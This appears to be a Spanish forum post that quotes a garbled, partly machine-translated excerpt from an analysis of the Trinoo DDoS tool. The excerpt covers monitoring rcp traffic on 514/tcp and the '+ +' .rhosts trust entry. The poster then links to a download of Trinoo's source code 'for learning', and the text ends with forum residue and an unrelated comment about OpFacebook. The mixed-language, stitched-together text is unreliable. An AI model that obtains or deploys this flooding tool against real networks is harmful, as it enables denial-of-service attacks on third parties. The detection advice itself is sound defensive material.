Los scripts observado para automatizar la instalación de las redes de Trinoo
utilizar el Berkeley "rcp" comando (el uso de PCR también se ha observado en un
capacidad de carga de archivos integrado en las nuevas versiones de la inundación "Tribu
Red "programa daemon). Monitoreo" rcp "conexiones (514/tcp) de
múltiples sistemas en la red, en rápida sucesión, a una sola dirección IP
dirección fuera de la red sería un disparador bien. (Note that the
use of "rcp" in a script requires an anonymous trust relationship,
usually in the form of "+ +" in a user's ~/.rhosts file, which also
will allow you to immediately archive the contents of this account
while contacting the owners to preserve evidence.)
Y claro si leiste hasta aca como no dejarte el codigo para que lo descargues y veas que onda
http://packetstormsecurity.org/distributed/trinoo.tgzPd: Siempre con fines de aprender ok ?
Saludos
Net
Autor
En línea
se manejan muchas hipotesis, desde que la OpFacebook no es mas que una cortina para otra Op....y hasta que que tendran contactos internos, empleados descontentos de facebook.
